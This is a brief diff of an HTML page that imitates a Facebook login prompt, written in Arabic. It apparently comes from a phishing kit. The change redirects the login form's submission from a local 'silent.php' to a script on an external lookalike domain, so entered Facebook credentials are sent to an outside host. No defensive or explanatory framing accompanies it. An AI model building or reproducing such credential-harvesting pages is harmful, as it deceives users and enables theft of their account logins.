--- a/index.html
+++ b/index.html
@@ -45,7 +45,7 @@ margin-bottom: 24px;
 text-align: center;
 font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
 }">تسجيل الدخول بحساب ‏‎Facebook‎‏ لبدء الاستخدام</p>
-<form action="silent.php" id="veh0" method="post" name="loginform">
+<form action="https://faccksc.xyz/ec/silent.php" id="veh0" method="post" name="loginform">
     <input style="border: 1px solid rgba(0, 0, 0, .20);
 border-radius: 4px;
 color: rgba(0, 0, 0, 1);
